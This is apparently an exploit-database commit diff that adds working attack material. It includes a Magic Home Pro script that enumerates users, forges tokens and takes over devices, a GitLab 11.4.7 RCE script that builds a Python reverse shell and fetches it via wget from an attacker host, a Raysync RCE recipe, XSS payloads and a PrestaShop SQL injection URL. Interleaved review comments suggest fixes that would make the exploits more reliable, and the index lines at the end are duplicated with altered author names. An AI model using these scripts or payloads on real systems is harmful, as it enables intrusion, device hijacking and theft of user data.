DB: 2020-12-17
6 changes to exploits/shellcodes Tibco ObfuscationEngine 5.11 - Fixed Key Password Decryption Adobe (Multiple Products) - XML Injection File Content Disclosure GitLab 11.4.7 - Remote Code Execution (Authenticated) Grav CMS 1.6.30 Admin Plugin 1.9.18 - 'Page Title' Persistent Cross-Site Scripting Raysync 3.3.3.8 - RCE Magic Home Pro 1.5.1 - Authentication Bypass PrestaShop ProductComments 4.2.0 - 'id_products' Time Based Blind SQL Injection Seotoaster 3.2.0 - Stored XSS on Edit page properties
parent
c487e85d00
commit
58ad270f64
7 changed files with 675 additions and 2 deletions
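--- a/exploits/android/webapps/49266.py
+++ b/exploits/android/webapps/49266.py
@@ -0,0 +1,292 @@
+# Exploit Title: Magic Home Pro 1.5.1 - Authentication Bypass
+# Google Dork: NA
+# Date: 22 October 2020
+# Exploit Author: Victor Hanna (Trustwave SpiderLabs)
+# Author Github Page: https://9lyph.github.io/CVE-2020-27199/
+# Vendor Homepage: http://www.zengge.com/appkzd
+# Software Link: https://play.google.com/store/apps/details?id=com.zengge.wifi&hl=en
+# Version: 1.5.1 (REQUIRED)
+# Tested on: Android 10
+
+## Enumeration ##
+
+import requests
+import json
+import os
+from colorama import init
+from colorama import Fore, Back, Style
+import re
+
+'''
+1. First Stage Authentication
+2. Second Stage Enumerate
+3. Third Stage Remote Execute
+'''
+
+global found_macaddresses
+found_macaddresses = []
+global outtahere
+outtahere = ""
+q = "q"
+global token
+
+
+def turnOn(target, token):
+
+urlOn = "https://wifij01us.magichue.net/app/sendCommandBatch/ZG001"
+array = {
+"dataCommandItems":[
+{"hexData":"71230fa3","macAddress":target}
+]
+}
+data = json.dumps(array)
+headersOn = {
+"User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)",
+"Accept-Language": "en-US",
+"Accept": "application/json",
+"Content-Type": "application/json; charset=utf-8",
+"token":token,
+"Host": "wifij01us.magichue.net",
+"Connection": "close",
+"Accept-Encoding": "gzip, deflate"
+}
+print (Fore.WHITE + "[+] Sending Payload ...")
+response = requests.post(urlOn, data=data, headers=headersOn)
+if response.status_code == 200:
+if "true" in response.text:
+print (Fore.GREEN + "[*] Endpoint " + Style.RESET_ALL + f"{target}" + Fore.GREEN + " Switched On")
+else:
+print (Fore.RED + "[-] Failed to switch on Endpoint " + Style.RESET_ALL + f"{target}")
+
+def turnOff(target, token):
+
+urlOff = "https://wifij01us.magichue.net/app/sendCommandBatch/ZG001"
+array = {
+"dataCommandItems":[
+{"hexData":"71240fa4","macAddress":target}
+]
+}
+data = json.dumps(array)
+headersOff = {
+"User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)",
+"Accept-Language": "en-US",
+"Accept": "application/json",
+"Content-Type": "application/json; charset=utf-8",
+"token":token,
+"Host": "wifij01us.magichue.net",
+"Connection": "close",
+"Accept-Encoding": "gzip, deflate"
+}
+print (Fore.WHITE + "[+] Sending Payload ...")
+response = requests.post(urlOff, data=data, headers=headersOff)
+if response.status_code == 200:
+if "true" in response.text:
+print (Fore.GREEN + "[*] Endpoint " + Style.RESET_ALL + f"{target}" + Fore.GREEN + " Switched Off")
+else:
+print (Fore.RED + "[-] Failed to switch on Endpoint " + Style.RESET_ALL + f"{target}")
+
+def lighItUp(target, token):
+
+outtahere = ""
+q = "q"
+if len(str(target)) < 12:
+print (Fore.RED + "[!] Invalid target" + Style.RESET_ALL)
+elif re.match('[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}$', target.lower()):
+while outtahere.lower() != q.lower():
+if outtahere == "0":
+turnOn(target, token)
+elif outtahere == "1":
+turnOff(target, token)
+outtahere = input(Fore.BLUE + "ON/OFF/QUIT ? (0/1/Q): " + Style.RESET_ALL)
+
+def Main():
+urlAuth = "https://wifij01us.magichue.net/app/login/ZG001"
+
+data = {
+"userID":"<Valid Registered Email/Username>",
+"password":"<Valid Registered Password>",
+"clientID":""
+}
+
+headersAuth = {
+"User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)",
+"Accept-Language": "en-US",
+"Accept": "application/json",
+"Content-Type": "application/json; charset=utf-8",
+"Host": "wifij01us.magichue.net",
+"Connection": "close",
+"Accept-Encoding": "gzip, deflate"
+}
+
+# First Stage Authenticate
+
+os.system('clear')
+print (Fore.WHITE + "[+] Authenticating ...")
+response = requests.post(urlAuth, json=data, headers=headersAuth)
+resJsonAuth = response.json()
+token = (resJsonAuth['token'])
+
+# Second Stage Enumerate
+
+print (Fore.WHITE + "[+] Enumerating ...")
+macbase = "C82E475DCE"
+macaddress = []
+a = ["%02d" % x for x in range(100)]
+for num in a:
+macaddress.append(macbase+num)
+
+with open('loot.txt', 'w') as f:
+for mac in macaddress:
+urlEnum = "https://wifij01us.magichue.net/app/getBindedUserListByMacAddress/ZG001"
+params = {
+"macAddress":mac
+}
+
+headersEnum = {
+"User-Agent": "Magic Home/1.5.1(ANDROID,9,en-US)",
+"Accept-Language": "en-US",
+"Content-Type": "application/json; charset=utf-8",
+"Accept": "application/json",
+"token": token,
+"Host": "wifij01us.magichue.net",
+"Connection": "close",
+"Accept-Encoding": "gzip, deflate"
+}
+
+response = requests.get(urlEnum, params=params, headers=headersEnum)
+resJsonEnum = response.json()
+data = (resJsonEnum['data'])
+if not data:
+pass
+elif data:
+found_macaddresses.append(mac)
+print (Fore.GREEN + "[*] MAC Address Identified: " + Style.RESET_ALL + f"{mac}" + Fore.GREEN + f", User: " + Style.RESET_ALL + f"{(data[0]['userName'])}, " + Fore.GREEN + "Unique ID: " + Style.RESET_ALL + f"{data[0]['userUniID']}, " + Fore.GREEN + "Binded ID: " + Style.RESET_ALL + f"{data[0]['bindedUniID']}")
+f.write(Fore.GREEN + "[*] MAC Address Identified: " + Style.RESET_ALL + f"{mac}" + Fore.GREEN + f", User: " + Style.RESET_ALL + f"{(data[0]['userName'])}, " + Fore.GREEN + "Unique ID: " + Style.RESET_ALL + f"{data[0]['userUniID']}, " + Fore.GREEN + "Binded ID: " + Style.RESET_ALL + f"{data[0]['bindedUniID']}\n")
+else:
+print (Fore.RED + "[-] No results found!")
+print(Style.RESET_ALL)
+
+if not found_macaddresses:
+print (Fore.RED + "[-] No MAC addresses retrieved")
+elif found_macaddresses:
+attackboolean = input(Fore.BLUE + "Would you like to Light It Up ? (y/N): " + Style.RESET_ALL)
+if (attackboolean.upper() == 'Y'):
+target = input(Fore.RED + "Enter a target device mac address: " + Style.RESET_ALL)
+lighItUp(target, token)
+elif (attackboolean.upper() == 'N'):
+print (Fore.CYAN + "Sometimes, belief isn’t about what we can see. It’s about what we can’t."+ Style.RESET_ALL)
+else:
+print (Fore.CYAN + "The human eye is a wonderful device. With a little effort, it can fail to see even the most glaring injustice." + Style.RESET_ALL)
+
+if __name__ == "__main__":
+Main()
+
+## Token Forging ##
+
+#!/usr/local/bin/python3
+
+import url64
+import requests
+import json
+import sys
+import os
+from colorama import init
+from colorama import Fore, Back, Style
+import re
+import time
+from wsgiref.handlers import format_date_time
+from datetime import datetime
+from time import mktime
+
+now = datetime.now()
+stamp = mktime(now.timetuple())
+
+'''
+HTTP/1.1 200
+Server: nginx/1.10.3
+Content-Type: application/json;charset=UTF-8
+Connection: close
+
+"{\"code\":0,\"msg\":\"\",\"data\":{\"webApi\":\"wifij01us.magichue.net/app\",\"webPathOta\":\"http:\/\/wifij01us.magichue.net\/app\/ota\/download\",\"tcpServerController\":\"TCP,8816,ra8816us02.magichue.net\",\"tcpServerBulb\":\"TCP,8815,ra8815us02.magichue.net\",\"tcpServerControllerOld\":\"TCP,8806,mhc8806us.magichue.net\",\"tcpServerBulbOld\":\"TCP,8805,mhb8805us.magichue.net\",\"sslMqttServer\":\"ssl:\/\/192.168.0.112:1883\",\"serverName\":\"Global\",\"serverCode\":\"US\",\"userName\":\"\",\"userEmail\":\"\",\"userUniID\":\"\"},\"token\":\"\"}"
+'''
+
+def Usage():
+print (f"Usage: {sys.argv[0]} <username> <unique id>")
+
+def Main(user, uniqid):
+os.system('clear')
+print ("[+] Encoding ...")
+print ("[+] Bypass header created!")
+print ("HTTP/1.1 200")
+print ("Server: nginx/1.10.3")
+print ("Date: "+str(format_date_time(stamp))+"")
+print ("Content-Type: application/json;charset=UTF-8")
+print ("Connection: close\r\n\r\n")
+
+jwt_header = '{"typ": "JsonWebToken","alg": "None"}'
+jwt_data = '{"userID": "'+user+'", "uniID": "'+uniqid+'","cdpid": "ZG001","clientID": "","serverCode": "US","expireDate": 1618264850608,"refreshDate": 1613080850608,"loginDate": 1602712850608}'
+jwt_headerEncoded = url64.encode(jwt_header.strip())
+jwt_dataEncoded = url64.encode(jwt_data.strip())
+jwtcombined = (jwt_headerEncoded.strip()+"."+jwt_dataEncoded.strip()+".")
+print ("{\"code\":0,\"msg\":\"\",\"data\":{\"webApi\":\"wifij01us.magichue.net/app\",\"webPathOta\":\"http://wifij01us.magichue.net/app/ota/download\",\"tcpServerController\":\"TCP,8816,ra8816us02.magichue.net\",\"tcpServerBulb\":\"TCP,8815,ra8815us02.magichue.net\",\"tcpServerControllerOld\":\"TCP,8806,mhc8806us.magichue.net\",\"tcpServerBulbOld\":\"TCP,8805,mhb8805us.magichue.net\",\"sslMqttServer\":\"ssl:\/\/192.168.0.112:1883\",\"serverName\":\"Global\",\"serverCode\":\"US\",\"userName\":\""+user+"\",\"userEmail\":\""+user+"\",\"userUniID\":\""+uniqid+"\"},\"token\":\""+jwtcombined+"\"}")
+
+if __name__ == "__main__":
+if len(sys.argv) < 3:
+Usage()
+else:
+Main(sys.argv[1], sys.argv[2])
+
+## Device Takeover PoC ##
+
+#!/usr/local/bin/python3
+
+import url64
+import requests
+import json
+import sys
+import os
+from colorama import init
+from colorama import Fore, Back, Style
+import re
+
+def Usage():
+print (f"Usage: {sys.argv[0]} <attacker email> <target email> <target mac address> <target forged token>")
+
+def Main():
+
+attacker_email = sys.argv[1]
+target_email = sys.argv[2]
+target_mac = sys.argv[3]
+forged_token = sys.argv[4]
+
+os.system('clear')
+print (Fore.WHITE + "[+] Sending Payload ...")
+url = "https://wifij01us.magichue.net/app/shareDevice/ZG001"
+
+array = {"friendUserID":attacker_email, "macAddress":target_mac}
+
+data = json.dumps(array)
+
+headers = {
+"User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)",
+"Accept-Language": "en-US",
+"Accept": "application/json",
+"Content-Type": "application/json; charset=utf-8",
+"token":forged_token,
+"Host": "wifij01us.magichue.net",
+"Connection": "close",
+"Accept-Encoding": "gzip, deflate"
+}
+
+response = requests.post(url, data=data, headers=headers)
+if response.status_code == 200:
+if "true" in response.text:
+print (Fore.GREEN + "[*] Target is now yours ... " + Style.RESET_ALL)
+else:
+print (Fore.RED + "[-] Failed to take over target !" + Style.RESET_ALL)
+
+if __name__ == "__main__":
+if len(sys.argv) < 5:
+Usage()
+else:
+Main()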
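Review bot: In Main's enumeration loop the chain `if not data: pass` / `elif data: ...` / `else:` can never reach its `else` branch, so the "[-] No results found!" message is dead code; collapse it to `if data:` with the existing body and an `else:` that prints the no-result message. The same loop passes `Fore.GREEN`/`Style.RESET_ALL` escape sequences into `f.write(...)`, so loot.txt ends up carrying terminal colour codes instead of plain text; write the fields without the colour constants there. Both `response.json()` results are indexed (`['token']`, `['data']`) without checking `response.status_code` or the key's presence, so an error body surfaces as a KeyError/ValueError rather than a readable failure. The file also concatenates three separate scripts (each with its own imports and `if __name__ == "__main__"` block) into one .py, which will not run as a single module; a top-of-file comment saying that the `## ... ##` headings delimit independent scripts would prevent that confusion. Indentation appears to have been lost in the rendered view, so the function bodies' structure is inferred rather than visible here.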
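--- a/exploits/linux/webapps/49265.txt
+++ b/exploits/linux/webapps/49265.txt
@@ -0,0 +1,25 @@
+# Exploit Title: Raysync 3.3.3.8 - RCE
+# Date: 04/10/2020
+# Exploit Author: XiaoLong Zhu
+# Vendor Homepage: www.raysync.io
+# Version: below 3.3.3.8
+# Tested on: Linux
+
+step1: run RaysyncServer.sh to build a web application on the local
+
+environment, set admin password to 123456 , which will be write to
+
+manage.db file.
+
+step2: curl "file=@manage.db" http://[raysync
+ip]/avatar?account=1&UserId=/../../../../config/manager.db
+
+to override remote manage.db file in server.
+
+step3: login in admin portal with admin/123456.
+
+step4: create a normal file with all permissions in scope.
+
+step5: modify RaySyncServer.sh ,add arbitrary evil command.
+
+step6: trigger rce with clicking "reset" button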
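--- a/exploits/php/webapps/49264.txt
+++ b/exploits/php/webapps/49264.txt
@@ -0,0 +1,45 @@
+# Exploit Title: Grav CMS 1.6.30 Admin Plugin 1.9.18 - 'Page Title' Persistent Cross-Site Scripting
+# Date: 13-12-2020
+# Exploit Author: Sagar Banwa
+# Vendor Homepage: https://getgrav.org/
+# Software Link: https://getgrav.org/downloads
+# Version: Grav v1.6.30 - Admin v1.9.18
+# Tested on: Windows 10/Kali Linux
+# Contact: https://www.linkedin.com/in/sagarbanwa/
+
+Step to reproduce :
+
+1) log in to the grav-admin panel
+2) Go to Pages
+3) Click on Add
+4) It will ask to Add Page
+5) fill the following details as below
+Page Title : <script>alert(1337)</script>
+Folder Name : sagar_Banwa
+Parent Page : /(root)
+Page Template : Default
+Value : yes
+6) click on the Save button
+7) now Click on Pages again.
+8) your page name will be listed as <script>alert(1337)</script>
+9) Now click on the eye button to see the XSS or you can simply go to http://127.0.0.1/grav-admin/ the XSS will pop-up
+
+-------------------------------------
+
+POST /grav-admin/admin/pages HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 230
+Origin: http://127.0.0.1
+Connection: close
+Referer: http://127.0.0.1/grav-admin/admin/pages
+Cookie: grav-site-a4a23f1-admin=ehrcji8qpnu8e50r839r4oe2on; grav-site-a4a23f1=u5438b49fft2b5d7610a53ne1d; grav-tabs-state={%22tab-options.routes.registration.Security%22:%22data.Security%22%2C%22tab-content.options.advanced%22:%22data.content%22}
+Upgrade-Insecure-Requests: 1
+
+data%5Btitle%5D=%3Cscript%3Ealert%281337%29%3C%2Fscript%3E&data%5Bfolder%5D=sagar_banwa&data%5Broute%5D=%2F&data%5Bname%5D=default&data%5Bvisible%5D=1&data%5Bblueprint%5D=&task=continue&admin-nonce=d488c0d8bdaf2978d50f174942d5279f
+
+-----------------------------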
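--- a/exploits/php/webapps/49267.txt
+++ b/exploits/php/webapps/49267.txt
@@ -0,0 +1,14 @@
+# Exploit Title: PrestaShop ProductComments 4.2.0 - 'id_products' Time Based Blind SQL Injection
+# Date: 2020-12-15
+# Exploit Author: Frederic ADAM
+# Author contact: contact@fadam.eu
+# Vendor Homepage: https://www.prestashop.com
+# Software Link: https://github.com/PrestaShop/productcomments
+# Version: 4.2.0
+# Tested on: Debian 10
+# CVE : CVE-2020-26248
+
+http://localhost/index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=[SQL]
+
+Example:
+http://localhost/index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(2)))a)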
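--- a/exploits/php/webapps/49268.txt
+++ b/exploits/php/webapps/49268.txt
@@ -0,0 +1,29 @@
+# Exploit Title: Seotoaster 3.2.0 - Stored XSS on Edit page properties
+# Exploit Author: Hardik Solanki
+# Vendor Homepage: https://www.seotoaster.com/
+# Software Link: https://crm-marketing-automation-platforms.seotoaster.com/
+# Version: 3.2.0
+# Tested on Windows 10
+
+XSS ATTACK:
+Cross-site Scripting (XSS) is a client-side code injection attack. The
+attacker aims to execute malicious scripts in a web browser of the victim
+by including malicious code in a legitimate web page or web application.
+The actual attack occurs when the victim visits the web page or web
+application that executes the malicious code. The web page or web
+application becomes a vehicle to deliver the malicious script to the user’s
+browser. Vulnerable vehicles that are commonly used for Cross-site
+Scripting attacks are forums, message boards, and web pages that allow
+comments.
+
+XSS IMPACT:
+1: Steal the cookie
+2: User redirection to a malicious website
+
+Vulnerable Parameters: Edit page properties
+
+Steps to reproduce:
+1: Navigate to "https://localhost/" and log in with valid credentials.
+2: Then navigates/click on "Edit page properties".
+3: Add the payload "*"><script>alert(document.cookie)</script>*", on "Page header H1 tag" field and click on "Save Page" button. Page Saved succesfully.
+4: Hence XSS will get stored and trigger on the main home/main page.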
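--- a/exploits/ruby/webapps/49263.py
+++ b/exploits/ruby/webapps/49263.py
@@ -0,0 +1,262 @@
+# Exploit Title: GitLab 11.4.7 Authenticated Remote Code Execution (No Interaction Required)
+# Date: 15th December 2020
+# Exploit Author: Mohin Paramasivam (Shad0wQu35t)
+# Software Link: https://about.gitlab.com/
+# POC: https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/
+# Tested on: GitLab 11.4.7 CE
+# CVE : CVE-2018-19571 (SSRF),CVE-2018-19585 (CRLF)
+
+import requests
+import re
+import warnings
+from bs4 import BeautifulSoup
+import sys
+import base64
+import urllib
+from random_words import RandomWords
+import argparse
+import os
+import time
+
+
+
+
+parser = argparse.ArgumentParser(description='GitLab 11.4.7 Authenticated RCE')
+parser.add_argument('-U',help='GitLab Username')
+parser.add_argument('-P',help='Gitlab Password')
+parser.add_argument('-l',help='rev shell lhost')
+parser.add_argument('-p',help='rev shell lport ',type=int)
+args = parser.parse_args()
+
+
+username = args.U
+password = args.P
+lhost = args.l
+lport = args.p
+
+
+#Retrieve CSRF Token
+
+warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
+gitlab_url = "http://10.129.49.62:5080"
+request = requests.Session()
+print("[+] Retrieving CSRF token to submit the login form")
+time.sleep(1)
+page = request.get(gitlab_url+"/users/sign_in")
+html_content = page.text
+soup = BeautifulSoup(html_content,features="lxml")
+token = soup.findAll('meta')[16].get("content")
+
+
+print("[+] CSRF Token : "+token)
+time.sleep(1)
+
+
+#Login
+
+login_info ={
+"authenticity_token": token,
+"user[login]": username,
+"user[password]": password,
+"user[remember_me]": "0"
+}
+
+
+login_request = request.post(gitlab_url+"/users/sign_in",login_info)
+
+
+if login_request.status_code==200:
+print("[+] Login Successful")
+time.sleep(1)
+
+else:
+
+print("Login Failed")
+print(" ")
+sys.exit()
+
+
+
+
+#Exploitation
+
+print("[+] Running Exploit")
+time.sleep(1)
+print("[+] Using IPV6 URL 'git://[0:0:0:0:0:ffff:127.0.0.1]:6379/test/ssrf.git' to bypass filter")
+time.sleep(1)
+
+ipv6_url = "git%3A%2F%2F%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A6379%2Ftest%2Fssrf.git"
+
+
+r = RandomWords()
+project_name = r.random_word()
+project_url = '%s/%s/'%(gitlab_url,username)
+
+print("[+] Creating Project")
+time.sleep(1)
+print("[+] Project Name : "+project_name)
+time.sleep(1)
+
+print("[+] Creating Python Reverse Shell")
+time.sleep(1)
+
+
+python_shell = 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%s",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'%(lhost,lport)
+
+
+os.system("touch shell.py")
+shell_file = open("shell.py","w")
+shell_file.write(python_shell)
+shell_file.close()
+
+
+print("[+] Reverse Shell Generated")
+time.sleep(1)
+
+print("[+] Start HTTP Server in current directory")
+
+
+print("Command : python3 -m http.server 80")
+time.sleep(2)
+
+http_server = raw_input("Continue (Y/N) : ")
+
+if (http_server=="N") or (http_server=="n"):
+print("Start HTTP Server before running exploit")
+
+elif (http_server=="Y") or (http_server=="y"):
+
+
+
+print("Run this script twice with options below to get SHELL!")
+print("")
+print("Option 1 : Download shell.py rev shell to server using wget")
+print("Option 2 : Execute shell.py downloaded previously")
+
+option = raw_input("Option (1/2) : ")
+
+
+if option=="1":
+
+
+
+reverse_shell= """\nmulti
+sadd resque:gitlab:queues system_hook_push
+lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\\'|setsid wget http://%s/shell.py \\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1513714403.8122594,\\"enqueued_at\\":1513714403.8129568}"
+exec
+exec
+exec\n""" %(lhost)
+
+
+project_page = request.get(gitlab_url+"/projects/new")
+html_content = project_page.text
+soup = BeautifulSoup(html_content,features="lxml")
+project_token = soup.findAll('meta')[16].get("content")
+namespace_id = soup.find('input', {'name': 'project[namespace_id]'}).get('value')
+urlencoded_token1 = project_token.replace("==","%3D%3D")
+urlencoded_token_final = urlencoded_token1.replace("+","%2B")
+
+
+payload=b"utf8=%E2%9C%93&authenticity_token={}&project%5Bimport_url%5D={}{}&project%5Bci_cd_only%5D=false&project%5Bname%5D={}&project%5Bnamespace_id%5D={}&project%5Bpath%5D={}&project%5Bdescription%5D=&project%5Bvisibility_level%5D=0".format(urlencoded_token_final,ipv6_url,reverse_shell,project_name,namespace_id,project_name)
+
+
+
+
+
+
+proxies = {
+"http" : "http://127.0.0.1:8080",
+"https" : "https://127.0.0.1:8080",
+}
+
+cookies = {
+'sidebar_collapsed': 'false',
+'event_filter': 'all',
+'hide_auto_devops_implicitly_enabled_banner_1': 'false',
+'_gitlab_session':request.cookies['_gitlab_session'],
+}
+
+headers = {
+'Host': '10.129.49.31:5080',
+'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
+'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
+'Accept-Language': 'en-US,en;q=0.5',
+'Accept-Encoding': 'gzip, deflate',
+'Referer': 'http://10.129.49.31:5080/projects',
+'Content-Type': 'application/x-www-form-urlencoded',
+'Content-Length': '398',
+'Connection': 'close',
+'Upgrade-Insecure-Requests': '1',
+}
+
+
+
+#response = request.post('http://10.129.49.31:5080/projects',data=payload,proxies=proxies,cookies=cookies,headers=headers,verify=False)
+
+response1 = request.post(gitlab_url+'/projects',data=payload,cookies=cookies,proxies=proxies,headers=headers,verify=False)
+print("[+] Success!")
+time.sleep(1)
+print("[+] Run Exploit with Option 2")
+
+
+elif option=="2":
+
+reverse_shell= """\nmulti
+sadd resque:gitlab:queues system_hook_push
+lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\\'|setsid python3 shell.py \\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1513714403.8122594,\\"enqueued_at\\":1513714403.8129568}"
+exec
+exec
+exec\n"""
+
+
+
+
+project_page = request.get(gitlab_url+"/projects/new")
+html_content = project_page.text
+soup = BeautifulSoup(html_content,features="lxml")
+project_token = soup.findAll('meta')[16].get("content")
+namespace_id = soup.find('input', {'name': 'project[namespace_id]'}).get('value')
+urlencoded_token1 = project_token.replace("==","%3D%3D")
+urlencoded_token_final = urlencoded_token1.replace("+","%2B")
+
+
+payload=b"utf8=%E2%9C%93&authenticity_token={}&project%5Bimport_url%5D={}{}&project%5Bci_cd_only%5D=false&project%5Bname%5D={}&project%5Bnamespace_id%5D={}&project%5Bpath%5D={}&project%5Bdescription%5D=&project%5Bvisibility_level%5D=0".format(urlencoded_token_final,ipv6_url,reverse_shell,project_name,namespace_id,project_name)
+
+
+
+
+
+
+proxies = {
+"http" : "http://127.0.0.1:8080",
+"https" : "https://127.0.0.1:8080",
+}
+
+cookies = {
+'sidebar_collapsed': 'false',
+'event_filter': 'all',
+'hide_auto_devops_implicitly_enabled_banner_1': 'false',
+'_gitlab_session':request.cookies['_gitlab_session'],
+}
+
+headers = {
+'Host': '10.129.49.31:5080',
+'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
+'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
+'Accept-Language': 'en-US,en;q=0.5',
+'Accept-Encoding': 'gzip, deflate',
+'Referer': 'http://10.129.49.31:5080/projects',
+'Content-Type': 'application/x-www-form-urlencoded',
+'Content-Length': '398',
+'Connection': 'close',
+'Upgrade-Insecure-Requests': '1',
+}
+
+
+
+#response = request.post('http://10.129.49.31:5080/projects',data=payload,proxies=proxies,cookies=cookies,headers=headers,verify=False)
+
+response1 = request.post(gitlab_url+'/projects',data=payload,cookies=cookies,proxies=proxies,headers=headers,verify=False)
+print("[+] Success!")
+time.sleep(1)
+print("[+] Spawning Reverse Shell")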
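Review bot: `gitlab_url` is fixed to `http://10.129.49.62:5080` while the `Host` and `Referer` headers in both option branches name `10.129.49.31:5080`, and the `proxies` dict routes every request through `127.0.0.1:8080`, so the committed script only describes the author's lab and fails outright when nothing listens on that proxy port; the base URL belongs with the other inputs already parsed by argparse, and the hand-set `Host`/`Content-Length` headers and `proxies` should be dropped so `requests` derives them from the actual request. `raw_input` and `b"...".format(...)` only work on Python 2, which the header does not state; a `# Requires Python 2.x` line under "# Tested on" would save the next reader a confusing NameError. `soup.findAll('meta')[16]` presumably relies on the CSRF tag being the 17th `<meta>` on the page, which is brittle across themes and versions. The two option branches duplicate the project-page fetch, payload, cookies, headers and post and differ only in the redis command string; a single helper taking that string would halve the file and keep the two paths from drifting.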
@ -11228,7 +11228,7 @@ id,file,description,date,author,type,platform,port
49203,exploits/windows/local/49203.txt,"Rumble Mail Server 0.51.3135 - 'rumble_win32.exe' Unquoted Service Path",2020-12-07,"Mohammed Alshehri",local,windows,
49203,exploits/windows/local/49203.txt,"Rumble Mail Server 0.51.3135 - 'rumble_win32.exe' Unquoted Service Path",2020-12-07,"Mohammed Alshehri",local,windows,
49205,exploits/windows/local/49205.txt,"Kite 1.2020.1119.0 - 'KiteService' Unquoted Service Path",2020-12-07,"Ismael Nava",local,windows,
49205,exploits/windows/local/49205.txt,"Kite 1.2020.1119.0 - 'KiteService' Unquoted Service Path",2020-12-07,"Ismael Nava",local,windows,
49211,exploits/windows/local/49211.ps1,"Druva inSync Windows Client 6.6.3 - Local Privilege Escalation (PowerShell)",2020-12-07,1F98D,local,windows,
49211,exploits/windows/local/49211.ps1,"Druva inSync Windows Client 6.6.3 - Local Privilege Escalation (PowerShell)",2020-12-07,1F98D,local,windows,
49221,exploits/multiple/local/49221.java,"Tibco ObfuscationEngine 5.11 - Fixed Key Password Decryption",2020-12-09,"Thomas Sluyter",local,multiple,
49221,exploits/multiple/local/49221.java,"Tibco ObfuscationEngine 5.11 - Fixed Key Password Decryption",2020-12-09,"Tess Sluyter",local,multiple,
49226,exploits/windows/local/49226.txt,"PDF Complete 3.5.310.2002 - 'pdfsvc.exe' Unquoted Service Path",2020-12-10,"Zaira Alquicira",local,windows,
49226,exploits/windows/local/49226.txt,"PDF Complete 3.5.310.2002 - 'pdfsvc.exe' Unquoted Service Path",2020-12-10,"Zaira Alquicira",local,windows,
49248,exploits/windows/local/49248.txt,"System Explorer 7.0.0 - 'SystemExplorerHelpService' Unquoted Service Path",2020-12-14,"Mohammed Alshehri",local,windows,
49248,exploits/windows/local/49248.txt,"System Explorer 7.0.0 - 'SystemExplorerHelpService' Unquoted Service Path",2020-12-14,"Mohammed Alshehri",local,windows,
49259,exploits/linux/local/49259.c,"libbabl 0.1.62 - Broken Double Free Detection (PoC)",2020-12-15,"Carter Yagemann",local,linux,
49259,exploits/linux/local/49259.c,"libbabl 0.1.62 - Broken Double Free Detection (PoC)",2020-12-15,"Carter Yagemann",local,linux,
@ -40317,7 +40317,7 @@ id,file,description,date,author,type,platform,port
|
||||||
42090,exploits/multiple/webapps/42090.txt,"KEMP LoadMaster 7.135.0.13245 - Persistent Cross-Site Scripting / Remote Code Execution",2017-05-30,SecuriTeam,webapps,multiple,
|
42090,exploits/multiple/webapps/42090.txt,"KEMP LoadMaster 7.135.0.13245 - Persistent Cross-Site Scripting / Remote Code Execution",2017-05-30,SecuriTeam,webapps,multiple,
|
||||||
42091,exploits/windows/webapps/42091.txt,"IBM Informix Dynamic Server / Informix Open Admin Tool - DLL Injection / Remote Code Execution / Heap Buffer Overflow",2017-05-30,SecuriTeam,webapps,windows,
|
42091,exploits/windows/webapps/42091.txt,"IBM Informix Dynamic Server / Informix Open Admin Tool - DLL Injection / Remote Code Execution / Heap Buffer Overflow",2017-05-30,SecuriTeam,webapps,windows,
|
||||||
41849,exploits/php/webapps/41849.txt,"Jobscript4Web 4.5 - Authentication Bypass",2017-04-08,TurkCyberArmy,webapps,php,
|
41849,exploits/php/webapps/41849.txt,"Jobscript4Web 4.5 - Authentication Bypass",2017-04-08,TurkCyberArmy,webapps,php,
|
||||||
41855,exploits/xml/webapps/41855.sh,"Adobe (Multiple Products) - XML Injection File Content Disclosure",2017-04-07,"Thomas Sluyter",webapps,xml,8400
|
41855,exploits/xml/webapps/41855.sh,"Adobe (Multiple Products) - XML Injection File Content Disclosure",2017-04-07,"Tess Sluyter",webapps,xml,8400
|
||||||
41856,exploits/php/webapps/41856.txt,"MyClassifiedScript 5.1 - SQL Injection",2017-04-11,"Ihsan Sencan",webapps,php,
|
41856,exploits/php/webapps/41856.txt,"MyClassifiedScript 5.1 - SQL Injection",2017-04-11,"Ihsan Sencan",webapps,php,
|
||||||
41858,exploits/php/webapps/41858.txt,"Social Directory Script 2.0 - SQL Injection",2017-04-11,"Ihsan Sencan",webapps,php,
|
41858,exploits/php/webapps/41858.txt,"Social Directory Script 2.0 - SQL Injection",2017-04-11,"Ihsan Sencan",webapps,php,
|
||||||
